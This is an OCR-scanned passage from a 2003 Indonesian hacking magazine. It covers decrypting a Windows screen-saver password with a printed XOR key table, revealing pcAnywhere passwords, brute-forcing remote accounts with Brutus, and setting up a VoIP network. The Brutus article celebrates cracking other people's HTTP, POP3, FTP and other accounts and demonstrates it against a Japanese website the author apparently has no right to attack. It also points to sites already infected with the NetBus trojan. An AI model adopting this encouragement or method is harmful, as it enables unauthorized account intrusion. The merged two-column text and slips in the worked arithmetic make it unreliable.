Lihatlah sekilas tabel tersebut, jika anda masih belum me-
mahaminya jangan khawatir. Saya akan menjelaskannya
dalam ketika proses cracking berlangsung.
Kini kita akan mulai melakukan cracking. Ambil sepasang
bilangan HEX yang pertama dari password yang kita da-
pat di Registri, yaitu 0C. Dalam proses cracking ini, lihat-
lah tabel ASCII sebagai panduan anda.
HEX 0 memiliki bilangan biner 0000 0000.
HEX C atau 0C memiliki bilangan biner 0000 1100
Deskripsi karakter ke-1
Kini kita akan membahasnya satu persatu dengan meng-
gunakan skema enkripsi untuk mendapatkan karakter
sesungguhnya.
0 = 0000 0000
0000 0100 ← didapat dari tabel skema enkripsi
baris pertama, kolom sebelah kiri
----------------- ← menggunakan metode XOR
0000 0100 ← hasil yang didapat
Bilangan biner 0000 0100 mewakili bilangan HEX 4.
NeoStart
Masih bingung dengan proses perhitungan dengan meto-
de XOR hingga mendapatkan hasil tertentu? Kini akan
saya bahas lebih dalam:
Bilangan yang akan dibandingkan adalah bilangan biner da-
ri 0 yaitu 0000 0000. Lalu saya menggunakan tabel enkripsi
untuk membandingkannya. Tabel enkripsi yang saya guna-
kan ialah baris pertama di kolom kiri yaitu 0000 0100.
Mengapa saya mengambil yang berada di baris pertama
pada tabel enkripsi? Karena karakter yang akan kita des-
kripsikan ialah karakter pertama, jadi tiap baris mewakili
urutan karakter. Baris 1 untuk karakter pertama, baris ke-
2 untuk karakter ke-2, dsb. Lalu mengapa terdapat kolom
sebelah kiri dan sebelah kanan? Karena seperti yang su-
dah disebutkan sebelumnya, setiap karakter sebenarnya
diwakili dengan 2 bilangan HEX. Seperti karakter D diwa-
kili bilangan HEX 0 dan C. Karena kita baru membahas
bilangan HEX 0, maka tabel enkripsi yang digunakan
ialah baris pertama dan kolom sebelah kiri.
Lalu bagaimanakah cara perhitngan dengan mengunakan
metode XOR? Sebenarnya caranya cukup mudah, lihatlah
lagi tabel XOR diatas. Proses perhitungan dilakukan
dengan cara membandingkan bilangan biner dengan tabel
enkripsi. Ingat :
0 dibandingkan dengan 0 menghasilkan 0,
0 dibandingkan dengan 1 menghasilkan 1,
1 dibandingkan dengan 0 menghasilkan 1,
1 dibandingkan dengan 1 menghasilkan 0,
jika diimplementasikan pada kasus kita,
0 0 0 0 0 0 0 0 ← dari bilangan biner dari HEX 0
0 0 0 0 0 1 0 0 ← dari tabel enkripsi
---------------- ← dihitung menggunakan metode XOR
0 0 0 0 0 1 0 0 ← hasil yang didapat.
Kini lihat pada tabel ASCII yang terdapat di belakang
artikel ini. Carilah bilangan HEX yang memiliki bilangan
biner 0000 0100. Bilangan HEX yang didapat ialah 4.
Kini kita telah selesai dengan bilangan HEX 0, dan akan
dilanjutkan dengan bilangan HEX C. Gunakan cara yang
---------------- ← dihitung menggunakan metode XOR
0000 0100 ← hasil yang didapat
Kini lihat pada tabel ASCII yang terdapat di belakang
artikel ini. Carilah bilangan HEX yang memiliki bilangan
biner 0000 0100. Bilangan HEX yang didapat ialah 4.
Setelah selesai menghitung bilangan HEX 0 dan C, maka
kita juga selesai mendekripsikan karakter pertama pada
kata sandi screen saver. Hasil terakhir yang didapat pada
perhitungan bilangan HEX 0 adalah 4, dan hasil pada bi-
langan HEX C adalah 4 juga. Kini gabungkan kedua hasil
tersebut yang akan menghasilkan bilangan HEX 44. Pada
tabel ASCII, carilah karakter yang memiliki bilangan
HEX 44. Karakter tersebut ialah D. Dan D merupakan ka-
rakter pertama kata sandi screen saver saya, mengingat
kata sandi screen saver saya yang sesungguhnya ialah
“DAVID.”
Deskripsi karakter ke-2
Setelah berhasil dengan karakter pertama, kini saya akan
mencoba dengan dekripsi karakter ke-2. Ambil pasangan
bilangan HEX yang kedua, yaitu AF. Tanpa basa-basi kita
akan langsung menghitung:
Februari 2003 NeoTek 9
 NeoStart

A = 0000 1010 ← dari bilangan biner dari HEX A 0000 1101 ← dari tabel enkripsi baris keempat
0000 1110 ← dari tabel enkripsi baris kedua kolom sebelah kanan
kolom sebelah kiri ---------------- ← dihitung menggunakan metode XOR
---------------- ← dihitung menggunakan metode XOR 0000 1001 ← hasil yang didapat.
0000 0100 ← hasil yang didapat. Kini lihat pada tabel ASCII yang terdapat di belakang ar-
Kini lihat pada tabel ASCII yang terdapat di belakang ar- tikel ini. Carilah bilangan HEX yang memiliki bilangan
tikel ini. Carilah bilangan HEX yang memiliki bilangan biner 0000 1001. Bilangan HEX yang didapat ialah 9.
biner 0000 0100. Bilangan HEX yang didapat ialah 4. Gabungkan kedua hasil bilangan HEX yang didapat di
F = 0000 1111 ← dari bilangan biner dari HEX F atas, yang akan menjadi 49. Carilah karakter yang
0000 1110 ← dari tabel enkripsi baris kedua memiliki bilangan HEX 49. Karakter tersebut ialah I.
kolom sebelah kanan Sementara ini, saya telah berhasil mendekripsi 3 karakter
---------------- ← dihitung menggunakan metode XOR pertama dari kata sandi screensaver di komputer saya.
0000 0001 ← hasil yang didapat. Karakter tersebut ialah D, A, V, I.
Kini lihat pada tabel ASCII yang terdapat di belakang
artikel ini. Carilah bilangan HEX yang memiliki bilangan Deskripsi karakter ke-5
biner 0000 0001. Bilangan HEX yang didapat ialah 1. Kita sampai ke karakter terakhir dari kata sandi screen-
Gabungkan kedua hasil bilangan HEX yang didapat di saver. Langsung saja kita hitung lagi dengan pasangan
atas, yang akan menjadi 41. Carilah karakter yang memi- bilangan HEX terakhir yaitu 23.
liki bilangan HEX 41. Karakter tersebut ialah A. 2 = 0000 0010 ← dari bilangan biner dari HEX 2
Sementara ini, saya telah berhasil mendeskripsi 2 karak- 0000 0110 ← dari tabel enkripsi baris kelima
ter pertama dari kata sandi screensaver di komputer saya. kolom sebelah kiri
Karakter tersebut ialah D, A. ---------------- ← dihitung menggunakan metode XOR
0000 0100 ← hasil yang didapat.
Deskripsi karakter ke-3 Kini lihat pada tabel ASCII yang terdapat di belakang ar-
Kini lanjutkan ke karakter ke-3. Ambil pasangan ke-3 dari tikel ini. Carilah bilangan HEX yang memiliki bilangan
bilangan HEX, yaitu 20. Dan mulai menghitung lagi. biner 0000 0100. Bilangan HEX yang didapat ialah 4.
2 = 0000 0010 ← dari bilangan biner dari HEX 2 3 = 0000 0011 ← dari bilangan biner dari HEX 2
0000 0111 ← dari tabel enkripsi baris ketiga 0000 0111 ← dari tabel enkripsi baris kelima
kolom sebelah kiri kolom sebelah kanan
---------------- ← dihitung menggunakan metode XOR ---------------- ← dihitung menggunakan metode XOR
0000 0101 ← hasil yang didapat. 0000 0100 ← hasil yang didapat.
Kini lihat pada tabel ASCII yang terdapat di belakang Kini lihat pada tabel ASCII yang terdapat di belakang ar-
artikel ini. Carilah bilangan HEX yang memiliki bilangan tikel ini. Carilah bilangan HEX yang memiliki bilangan
biner 0000 0101. Bilangan HEX yang didapat ialah 5. biner 0000 1001. Bilangan HEX yang didapat ialah 4.
0 = 0000 0000 ← dari bilangan biner dari HEX 0 Gabungkan kedua hasil bilangan HEX yang didapat
0000 0110 ← dari tabel enkripsi baris ketiga diatas, yang akan menjadi 44. Carilah karakter yang
kolom sebelah kanan memiliki bilangan HEX 44. Karakter tersebut ialah D.
---------------- ← dihitung menggunakan metode XOR Akhirnya, saya telah berhasil mendsekripsi 3 karakter
0000 0110 ← hasil yang didapat. pertama dari kata sandi screensaver di komputer saya.
Kini lihat pada tabel ASCII yang terdapat di belakang ar- Karakter tersebut ialah D, A, V, I, dan D.
tikel ini. Carilah bilangan HEX yang memiliki bilangan Kini saya telah berhasil membongkar kata sandi screen-
biner 0000 0110. Bilangan HEX yang didapat ialah 6. saver yang telah dienkripsi oleh Windows. Mudah ‘kan?
Gabungkan kedua hasil bilangan HEX yang didapat di Yang perlu ditekankan di sini hanyalah ketelitian dan
atas, yang akan menjadi 56. Carilah karakter yang memi- kesabaran.
liki bilangan HEX 56. Karakter tersebut ialah V.
Sementara ini, saya telah berhasil mendeskripsi 3 karak- Tabel Enkripsi Password Screen Saver
ter pertama dari kata sandi screensaver di komputer saya.
Karakter tersebut ialah D, A, V. Baris Ke - Kiri Kanan
1 0000 0100 0000 1000
Deskripsi karakter ke-4 2 0000 1110 0000 1110
Kini lanjutkan ke karakter ke-4. Ambil pasangan ke-4 dari 3 0000 0111 0000 0110
bilangan HEX, yaitu 54. Hitung lagi 4 0000 0001 0000 1101
5 = 0000 0101 ← dari bilangan biner dari HEX 5 5 0000 0110 0000 0111
0000 0001 ← dari tabel enkripsi baris keempat 6 0000 0110 0000 1001
kolom sebelah kiri 7 0000 1010 0000 0001
---------------- ← dihitung menggunakan metode XOR 8 0000 0001 0000 1011
0000 0100 ← hasil yang didapat. 9 0000 0111 0000 1011
10 0000 1000 0000 1100
Kini lihat pada tabel ASCII yang terdapat di belakang ar- 11 0000 0100 0000 0111
tikel ini. Carilah bilangan HEX yang memiliki bilangan 12 0000 1111 0000 1000
biner 0000 0100. Bilangan HEX yang didapat ialah 4. 13 0000 0101 0000 0100
4 = 0000 0100 ← dari bilangan biner dari HEX 4 14 0000 1001 0000 0101

10 NeoTek Februari 2003

 NeoStart

Tabel ASCII (karena keterbatasan halaman, hanya ditampilkan karakter ASCII yang umum digunakan)
HEX Biner Karakter HEX Biner Karakter HEX Biner Karakter HEX Biner Karakter
0 0000 0000 2D 0010 1101 - 49 0100 1001 I 65 0110 0101 e
1 0000 0001 2E 0010 1110 . 4A 0100 1010 J 66 0110 0110 f
2 0000 0010 2F 0010 1111 / 4B 0100 1011 K 67 0110 0111 g
3 0000 0011 30 0011 0000 0 4C 0100 1100 L 68 0110 1000 h
4 0000 0100 31 0011 0001 1 4D 0100 1101 M 69 0110 1001 i
5 0000 0101 32 0011 0010 2 4E 0100 1110 N 6A 0110 1010 j
6 0000 0110 33 0011 0011 3 4F 0100 1111 O 6B 0110 1011 k
7 0000 0111 34 0011 0100 4 50 0101 0000 P 6C 0110 1100 l
8 0000 1000 35 0011 0101 5 51 0101 0001 Q 6D 0110 1101 m
9 0000 1001 36 0011 0110 6 52 0101 0010 R 6E 0110 1110 n
A 0000 1010 37 0011 0111 7 53 0101 0011 S 6F 0110 1111 o
B 0000 1011 38 0011 1000 8 54 0101 0100 T 70 0111 0000 p
C 0000 1100 39 0011 1001 9 55 0101 0101 U 71 0111 0001 q
D 0000 1101 3A 0011 1010 : 56 0101 0110 V 72 0111 0010 r
E 0000 1110 3B 0011 1011 ; 57 0101 0111 W 73 0111 0011 s
F 0000 1111 3C 0011 1100 < 58 0101 1000 X 74 0111 0100 t
21 0010 0001 ! 3D 0011 1101 = 59 0101 1001 Y 75 0111 0101 u
22 0010 0010 " 3E 0011 1110 > 5A 0101 1010 Z 76 0111 0110 v
23 0010 0011 # 3F 0011 1111 ? 5B 0101 1011 [ 77 0111 0111 w
24 0010 0100 $ 40 0100 0000 @ 5C 0101 1100 \ 78 0111 1000 x
25 0010 0101 % 41 0100 0001 A 5D 0101 1101 ] 79 0111 1001 y
26 0010 0110 & 42 0100 0010 B 5E 0101 1110 ^ 7A 0111 1010 z
27 0010 0111 ' 43 0100 0011 C 5F 0101 1111 _ 7B 0111 1011 {
28 0010 1000 ( 44 0100 0100 D 60 0110 0000 ' 7C 0111 1100 |
29 0010 1001 ) 45 0100 0101 E 61 0110 0001 a 7D 0111 1101 }
2A 0010 1010 * 46 0100 0110 F 62 0110 0010 b 7E 0111 1110 ~
2B 0010 1011 + 47 0100 0111 G 63 0110 0011 c
2C 0010 1100 , 48 0100 1000 H 64 0110 0100 d

PC ANYWHERE PASSVIEW
agaimana kalau anda lupa dengan
B password anda sendiri sehingga
tidak bisa mengakses host ataupun
mengubah konfigurasi pada komponen-

MENGUAK PASSWORD komponen pcAnywhere?

Gunakan pcAnywhere PassView! Anda se-
bagai pemakai sebenarnya pcAnywhere ten-

PC ANYWHERE tunya mendapatkan akses langsung pada

komputer yang terinstal pcAnywhere, yang
berarti password-password itu dapat diung-
pcAnywhere adalah salah satu remote access tool yang paling kapkan dengan mudah dengan pcAnypass.
populer. Selain akses ke host, komponen-komponen pada Tapi awas, orang lain dapat saja mengintip
password anda bila mendapat akses fisik ke
pcAnywhere dapat dilindungi dengan password. komputer anda.

Kini tidak perlu lagi khawatir bila anda lupa dengan password pcAnywhere anda.

2
PCANYWHERE PASSVIEW
1 Double click pada icon PCAnypass
yang akan menampilkan jendela
2 Password dari user kosasih untuk
PCAnywhere PassView. Klik tombol
Get Password dan masuk ke folder
pcAnywhere. Akan tampak kom-
ponen-komponen yang dapat di-
periksa keberadaan password-nya.
ACCESS PASSWORD KONFIGURASI KOMPONEN
akses ke pcAnywhere host tersim-
3 Setiap komponen pada pcAnywhere,
baik untuk host maupun client, da-
pan dalam komponen PCA kosasih. pat dikonfigurasi. Password digu-
Setelah Get Password, Open nakan agar konfigurasi ini tidak
komponen PCA kosasih untuk diutak-atik orang. Password ini pun
menampilkan user name dan dapat diungkapkan dengan mudah.
password-nya.

Februari 2003 NeoTek 11

 NeoStart

PASSWO R D C R AC K I N G
Remote Computer
dengan Brutus
Password cracking umumnya mensyaratkan kita mendapatkan akses langsung pada komputer
penyimpan password (local console) seperti pada screen saver pasword, cached password,
maupun file pwl. Untuk remote computer dapat digunakan Brutus. Eryanto Sitorus
(ery@postmaster.co.uk) membahasnya untuk anda.

EBERAPA HARI YANG LALU, KIRA-KIRA 15 MENIT sebe-
B lum jam pulang kantor, seorang rekan kerja saya
yang sangat expert dibidang akuntansi keuangan,
bertanya seperti ini, “Gue bingung deh, apa sih asyiknya
hacking, phreaking, dan cracking? Apa kamu enggak
pernah merasa bersalah dan bosan melakukan itu?” Sam-
bil menarik sebatang rokok Marlboro yang masih tersisa
5 batang lagi, saya balas bertanya, “Ente sendiri? Apa
enggak jenuh ngurusi akuntansi setiap hari? Hari-hari
yang lo lacak (audit) uang melulu…apa kagak bosan tuh?"
Terus terang saja, saya menanyakan itu karena saya sen-
diri juga sering merasa heran setiap kali melihatnya begi-
tu asyik dengan pekerjaannya, sampai lupa waktu. Kalau
beliau sedang melacak (mengaudit) laporan keuangan,
maka jangan harap dia bisa diajak talking, jalan-jalan, atau
makan, sekalipun yang mengajaknya itu adalah pacar-nya
sendiri. Tapi apabila suatu waktu dia tiba-tiba berteriak
“Yes!” karena berhasil dan sukses melacak sejumlah ang-
ka yang menyebabkan laporan keuangan yang diterima-
nya dari beberapa kantor cabang tidak klop, maka itu ber-
arti rezeki buat saya. Lihat saja, dia pasti tidak akan lupa
untuk mentraktir makan Kwetiau Goreng. Sudah ke-
nyang, dapat dua bungkus Marlboro lagi. Asyik banget!
Apa yang saya ceritakan tersebut di atas adalah sekedar
ilustrasi, bahwa secara teoretis, kita bisa mengasumsikan
hacker, phreaker, dan cracker sebagai suatu profesi atau
simbol status yang tidak kalah penting seperti seorang
akuntan professional. Jika seorang akuntan menyukai tan-
tangan untuk memburu angka-angka yang mereka anggap
tidak visible, maka hal yang sama juga berlaku bagi para
hacker, phreaker, atau mereka yang menyukai password
cracker. Memeriksa, melacak, atau usaha-usaha untuk meng-
crack kata sandi (password), tentu saja merupakan peker-
jaan yang sangat mengasyikkan dan sekaligus menantang.
Dan begitu kita berhasil meng-crack sejumlah kata sandi
dari beberapa layanan (services) Internet milik orang lain,
maka tidak ada hal yang lebih memuaskan dari pada itu.
Anda tidak percaya? Silakan membuktikannya sendiri.
Saat ini, kita semua tentunya sudah menyadari, bahwa
seiring dengan kian meningkatnya jumlah pengguna In-
ternet yang terhubung ke server-server jaringan Internet
secara global, maka jumlah account (username dan pass-
word) yang bisa di-crack pun semakin meningkat dan
bertambah banyak (bervariasi), termasuk jumlah orang
yang menyukai tantangan untuk mendapatkan account-
account tersebut. Beberapa account penting yang layak
dan menarik untuk di crack, diantaranya adalah account
untuk: HTTP (Website), POP3 (email), FTP, Shell, IRC
(nick dan channel), ICQ, SMB (NetBIOS), IMAP, NNTP,
dan masih banyak yang lainnya. Nah, karena sudah me-
nyangkut masalah teknis dan agak terkesan rumit, lalu di
benak kita kemudian muncul satu pertanyaan, yakni: apa
yang harus saya lakukan atau pelajari agar saya bisa
meng-crack account masing-masing layanan (services)
tersebut di atas?. Jika itu adalah termasuk salah satu mo-
del pertanyaan yang akan anda ajukan, maka saya akan
menjawabnya seperti ini: Gampang koq, pakai saja cara
instant!. Dengan begitu maka anda tidak perlu mengha-

Brutus mengandalkan proses brute force dalam password cracking

MELIHAT HASIL CRACKING MENGUJI VALIDITAS OPSI METODE HTTP

1 Apabila ada entri pada word list
yang cocok dengan password yang
2 Uji validitas password yang
diperoleh dengan WS_FTP,
3 Dalam usaha meng-crack
HTTP password ada beberapa
dicari. Hasilnya ditampilkan. Putty, atau Telnet. opsi metode.

12 NeoTek Februari 2003

 NeoStart

• Gambar 1: Search target host yang akan di-crack. • Gambar 2: Tentukan tipe layanan yang akan di-crack.

biskan waktu untuk mempelajari sesatu yang (katakan-
lah) bagi anda sangat tidak memungkinkan dan tidak ma-
suk akal. Yah, menurut saya itu jauh lebih bermanfaat
daripada nantinya anda ketinggalan informasi dan kehi-
langan kesempatan.
Dari sekian banyak perangkat lunak yang dapat melaku-
kan tugas tersebut di atas, ada satu buah software pass-
word cracker yang layak untuk anda pertimbangkan, yai-
tu Brutus, yang diciptakan pada akhir tahun 1998 yang
lalu. README file menyebutkan, “Brutus is one of the
fastest, most flexible remote password crackers you can
get your hands on—it's also free. It is available for Win-
dows 9x, NT and 2000, there is no UN*X version avail-
able although it is a possibility at some point in the future.
Brutus was first made publicly available in October 1998
and since that time there have been at least 70,000
downloads and over 175,000 visitors to this page. Deve-
lopment continues so new releases will be available in
the near future.” Artinya, Brutus sebagai salah satu re-
mote password cracker, adalah yang paling memungkin-
kan, proses cracking-nya sangat cepat, dan sangat fleksi-
bel. Namun begitu, Brutus hanya bisa dioperasikan pada
mesin-mesin yang menjalankan sistem operasi Microsoft
Windows 95/98/ME/2000/XP, atau NT.
Adapun fitur atau jenis-jenis account layanan yang bisa
di crack Brutus, antara lain adalah sebagai berikut:
• HTTP (Basic Authentication) • Telnet
• HTTP (HTML Form/CGI) • IMAP
• POP3 • NNTP
• FTP • NetBus
• SMB
Bagi anda yang tertarik ingin menggunakan Brutus, sila-
kan menginstal terlebih dahulu dari dalam CD NeoTek
nomor ini. Atau anda juga bisa mengambilnya langsung
dari alamat situs pembuatnya di www.hoobie.net.
Mengoperasikan Brutus
Mengoperasikan Brutus sama sekali tidak sulit. Anda cu-
kup menentukan alamat IP atau target host beserta tipe
layanan yang akan anda crack, seperti terlihat pada
Gambar 1.
Informasi pada Gambar 1 merupakan alamat sebuah Web
(situs) milik negara Jepang yang saya reverse ke dalam
bentuk IP menggunakan fasilitas WHOIS. Kemudian se-
telah itu, sebagai langkah berikutnya, paste alamat IP ter-
sebut ke dalam field target, lalu pilih type/jenis layanan
yang akan anda crack, seperti terlihat pada Gambar 2.
Sebelum anda mengklik tombol Start, pastikan sekali lagi
bahwa anda sudah memeriksa semua opsi yang berkenaan
dengan service yang akan di-crack tersebut. Dan setelah
semuanya OK, segera klik tombol Start untuk memulai
proses cracking.

SETTING AUTHENTICATION DIGABUNG DENGAN NETBUS WORD LIST TOOL

4 Password yang anda cobakan
akan diotentikasi oleh situs
5 Apabila situs yang diserang
sudah terinfeksi Netbus trojan,
6 Word list tool meningkatkan
kemampuan word list dalam
yang diserang. Atur urutannya. maka port 12345 terbuka. menebak password.

Februari 2003 NeoTek 13

 NeoTekno
Panduan Singkat Membangun Jaringan
VoI P Merdeka
TOnno W. Purbo (onno@indo.net.id) mengungkapkan keprihatinannya dengan membentuk jaringan VoIP
untuk rakyat. Pemakai biasa cukup menggunakan Netmeeting yang sudah standar pada Windows dan
registrasi ke gatekeeper yang disediakan oleh APJII.
Panduan ini diberikan untuk beberapa skenario:
1. End user dengan PC yang ada sambungan ke Internet
(IP Public) tanpa proxy server, biasanya dial-up user
atau pengguna rumahan.
2. End user dengan PC yang tersambung ke Internet me-
lalui proxy server di Warnet, perkantoran atau sekolah.
3. Operator proxy server, seperti Warnet, kantor dll.
4. Operator gatekeeper di Internet.
5. End user yang menggunakan peralatan gateway VoIP.
Jika termasuk kategori ini, anda cukup beruntung karena
memungkinkan anda untuk membangun RT/ RW-net
VoIP untuk membypass SLJJ dan SLI yang mahal itu.
Usulan penggunaan nomor telepon di
jaringan VoIP Merdeka
Agar jaringan VoIP Merdeka dapat beroperasi dengan
lancar perlu kesepakatan alokasi nomor telepon yang
akan digunakan. Saya usulkan menggunakan format:
0111 aaa ttttt xx
misalnya
0111 021 12345 xx
di mana
0111 = call area untuk VoIP Merdeka
021 = jika anda berada di Jakarta (3 digit), Bogor 251,
Bandung 022 dll.
12345 = 5 digit pertama nomor telkom di daerah anda
xx = silakan mengarang sendiri, isi 01, 02, 03, 04, 05,
06, 07 dst.
Perhatikan bagian aaa, kita mengambil tiga digit dari area
code milik Telkom untuk mengidentifikasi dari daerah ma-
na lokasi pesawat telepon VoIP anda. Perhatikan untuk
pengguna yang mempunyai area code 2 digit, seperti Jakar-
ta 21, Bandung 22, maka bagian aaa diisi 021, atau 022 di-
beri angka nol di awalnya. Sedang bagi anda yang mem-
punya area code tiga digit seperti Bogor 251, maka tidak
perlu memberi angka nol. Penomoran ini dalam jaringan
VoIP Merdeka dikenal menggunakan format E.164.
Sebetulnya kurang tepat menggunakan hanya call area
0111. Secara internasional harusnya menggunakan 62 111
bukan 0 111. Jika nanti dibutuhkan untuk interkoneksi se-
cara nasional/internasional bisa dilakukan proses rewrite
nomor E.164 di gatekeeper pada bagian [RasSvr::RewriteE164],
jadi tidak masalah menggunakan nomor 0111.
Gatekeeper yang di operasikan di jaringan VoIP Merdeka
sebetulnya secara teknis dapat mengenali nomor-nomor
milik Telkom maupun operator telekomunikasi lain, misal
021 1234567, atau 0811 123456 dsb. Oleh karena itu
14 NeoTek Februari 2003
sebetulnya kalau di ijinkan jaringan VoIP Merdeka dapat
saja tersambung ke jaringan milik Telkom, Indosat
maupun operator telekomunikasi lain.
Bagi operator gateway VoIP dan gatekeeper yang cukup
pandai sebetulnya dapat dengan mudah mengintegrasikan
jaringan VoIP Merdeka ke jaringan milik Telkom dsb.
Tentunya harus dilakukan dengan hati-hati supaya anda
tidak terkena sangsi penjara. Maklumlah pemerintah di
Indonesia ‘kan tidak terlalu berpihak pada rakyat.
End user dengan PC yang ada sambungan ke
Internet (IP Public) tanpa proxy server
Peralatan yang dibutuhkan sangat sederhana
1. PC yang tersambung langsung ke Internet; dial-up pun OK.
2. sound card + mikrofon + headphone (sebaiknya meng-
gunakan handphone supaya suara tidak feedback ke
mikrofon).
3. software NetMeeting 3.01, biasanya sudah tersedia di
Windows 98 ke atas. Jika belum ada, dapat di download
gratis di www.microsoft.com/netmeeting. Bagi anda
yang menggunakan Linux, dapat menggunakan
GnomeMeeting.
Setup software untuk VoIP, untuk pengguna Windows
dan NetMeeting 3.01:
Tools → Options → General → Advanced Calling
→ Use a gatekeeper to place a call (isikan IP gatekeeper
di IIX)
→ log on using my phone number (isikan nomor
telepon sesuai konsensus di atas)
IP gatekeeper di IIX adalah 202.148.63.18 Gatekeeper ter-
sebut milik APJII (Asosiasi Penyelenggara Jasa Internet
Indonesia) yang terletak di Indonesia Internet Exchange
(IIX). Dengan meregistrasikan diri ke gatekeeper milik
APJII ini, anda dapat berkomunikasi dengan rekan-rekan
lain yang terkait di jaringan VoIP Merdeka. Silakan
memonitor/menanyakannya di mailing list genetika@
yahoogroups.com untuk keterangan lebih lanjut tentang
gatekeeper untuk keperluan publik ini.
Pada saat anda dial ke Internet, secara otomatis NetMeeting
akan mencari gatekeeper untuk meregistrasikan PC (no-
mor telepon anda). Jika NetMeeting berhasil teregistrasi,
pada pojok kanan bawah console NetMeeting akan ada
gambar 2 buah komputer yang saling tersambung dengan
warna yang jelas, sebelumnya warnanya tidak jelas.
Setelah NetMeeting terregistrasi ke gatekeeper, anda bisa
menelpon ke rekan lain yang menggunakan jaringan
VoIP Merdeka dan menggunakan nomor 0111 xxx
xxxxxxxx.

Visualisasi Proses Setting Gatekeeper
di NetMeeting
Agar para pengguna NetMeeting di Windows tidak
terlalu pusing kepala, berikut ini saya sertakan visualisasi
proses setting gatekeeper di NetMeeting.
Tampak pada gambar tam-
pilan software NetMeeting
yang siap dioperasikan.
Tombol yang perlu kita
perhatikan untuk memu-
lai setting gatekeeper Net-
Meeting adalah tombol
Tools yang berada di atas
nomor tiga dari kiri.
Setelah tombol Tools →
Options ditekan, anda akan
melihat beberapa Options
NetMeeting yang dapat di-
set, yaitu General, Secur-
ity, Audio, dan Video.
Untuk operasi jaringan
VoIP Merdeka, kita cukup
menset bagian General ini
dan juga bagian Advanced
Calling yang terdapat di
bagian kanan bawah.
Isikan First Name, Last
Name, E-mail address, Location dan Comment sesuai
dengan data pribadi anda.
Jangan diklik bagian Directory setting, karena pada hari ini
Microsoft Internet Directory tidak beroperasi dengan baik.
Jika anda menginginkan NetMeeting beroperasi di back-
ground setiap kali Windows start, klik kotak di depa kalimat
“Run NetMeeting in the background when Windows starts.”
Jika tombol Advanced Calling Options ditekan, muncul
pilihan untuk menset Gatekeeper atau Gateway yang
akan digunakan oleh NetMeeting untuk berkomunikasi.
Dalam jaringan VoIP Merdeka, kita menggunakan Gate-
keeper. Klik pada kalimat “Use a gatekeeper to place calls”
NeoTekno
dan isikan nomor IP gatekeeper yang akan digunakan.
Bagi anda yang tidak menggunakan server proxy dan lang-
sung terhubung ke Internet menggunakan dial-up dapat
menggunakan gatekeeper 202.148.63.18 milik APJII yang
terletak di IIX. Jika ada masalah dengan gatekeeper mo-
hon ditanyakan melalui melalui mailing list genetika
@yahoogroups.com di Internet atau langsung kepada saya
pribadi di onno@indo.net.id.
Yang perlu diklik juga adalah kalimat “Log on using my
phone number,” lalu isikan nomor telepon anda sesuai
saran penomoran telepon di atas. Perlu diperhatikan bahwa
gatekeeper hanya akan meregistrasi telepon dengan nomor
0111 xxx xxxxxxx di Internet. Mohon dijaga agar nomor
telepon ini tetap anda gunakan dan tidak diubah-ubah
karena sewaktu-waktu rekan anda akan menghubungi anda
menggunakan nomor telepon yang sudah anda set.
Setelah anda tersambung ke
Internet dan NetMeeting ber-
hasil teregistrasi ke gatekeeper,
perhatikan gambar dua kom-
puter di pojok kanan bawah di
tampilan NetMeeting. Gambar
kedua komputer itu akan ber-
ubah warna, bukan lagi abu-
abu. Hal ini menunjukkan bah-
wa NetMeeting telah teregis-
trasi dengan baik ke gatekeeper.
Untuk berkomunikasi dengan
rekan melalui VoIP dan Net-
Meeting sama sekali tidak sukar.
Yang perlu anda lakukan ha-
nya mengklik tombol telepon
di kanan atas NetMeeting dan memasukan nomor telepon
yang akan dihubungi.
Jika hubungan komunikasi berhasil dijalin, maka gambar
komputer di kanan bawah, di sebelah gambar dua kompu-
ter akan berubah warna. Selamat ber-VoIP ria dan berhe-
mat pulsa.
End user dengan PC yang tersambung ke Internet
melalui proxy server
Jika anda merupakan PC end user di belakang proxy/win-
gate/winroute atau LAN dengan IP 192.168.x.x atau
10.x.x.x maka anda termasuk kategori end user dengan PC
Februari 2003 NeoTek 15
 NeoTekno
yang tersambung ke Internet melalui proxy. Biasanya PC
demikian akan digunakan di Warnet, LAN perkantoran,
LAN sekolah atau kampus.
Sebetulnya, secara prinsip tidak berbeda dengan end user
yang mempunyai sambungan langsung ke Internet. Beda-
nya anda harus registrasi ke gatekeeper yang berada di
mesin proxy/wingate/winroute anda; jangan meregistrasi
ke gatekeeper publik 202.148.63.18 yang dioperasikan di IIX
atas dukungan APJII. Anda tidak mungkin registrasi dan
mengoperasikan VoIP tanpa bantuan gatekeeper di proxy
server karena port VoIP tidak bisa menembus proxy.
Hal ini akan menjadi masalah bagi sebagian besar pengguna
Internet di Indonesia karena umumnya berada di belakang
proxy. Anda disarankan meminta kepada operator proxy
server tersebut untuk mengoperasikan gatekeeper di
proxy server-nya.
Teknik instalasi software gatekeeper
Software yang digunakan adalah Open H.323 gatekeeper.
Software tersebut dapat di ambil di www.sourceforge.net
atau www.sf.net dengan menggunakan keyword openh323
gatekeeper. Atau langsung dari www.gnugk.org. Open
H.323 gatekeeper tersedia dalam beberapa versi Linux
maupun Windows.
Perlu dicatat bahwa software gatekeeper yang digunakan
adalah open source sehingga dapat digunakan secara
cuma-cuma tanpa melanggar hak cipta sama sekali.
Beberapa versi yang berhasil saya jalankan dengan baik,
• gk-2.0a-linux-bin.tgz berjalan dengan baik di Linux
Mandrake 8.0.
• gk-2.0.2-linux-bin.tgz berjalan dengan baik di Linux
Mandrake 9.0
• gk-2.0.2-windows-bin.zip berjalan dengan baik di
Windows 98 (dan kemungkinan di versi Windows yang
lebih tinggi).
Bila anda melihat di www.gnugk.org ada versi develop-
ment 2.1-nya. Silakan coba gunakan dan tanggung
risikonya sendiri hehehehe ….
Bagi pengguna Windows, anda dapat mengoperasikan
gatekeeper tersebut di mesin Windows dan juga dapat di
operasikan berdampingan dengan software proxy yang
ada seperti Wingate atau Winroute. Sayangnya Windows
rentan sekali dengan virus dan tidak seandal Linux untuk
dioperasikan sebagai server.
Langkah instalasi di Windows sebetulnya lebih mudah
daripada di Linux:
1. copykan gk-2.0.2-windows-bin.zip ke salah satu direk-
tori, misal D:\temp.
2. ekstrak gk-2.0.2-windows-bin.zip menggunakan Winzip.
3. akan terlihat folder D:\temp\openh323gk\
4. File gnugk.exe terdapat di folder D:\temp\openh323gk\
bin\
5. File-file contoh konfigurasi ada di folder
D:\temp\openh323gk\etc\
Pada titik ini anda dapat masuk ke D:\temp\openh323gk\
bin\ dan menjalankan gnugk dengan mengetikkan
gnugk -h
untuk melihat semua perintah command line yang didukung.
Bagian yang akan membuat kepala pusing adalah menset
parameter dari file konfigurasi yang akan saya terangkan
dibawah. Jika telah selesai menset konfigurasi file-nya
16 NeoTek Februari 2003
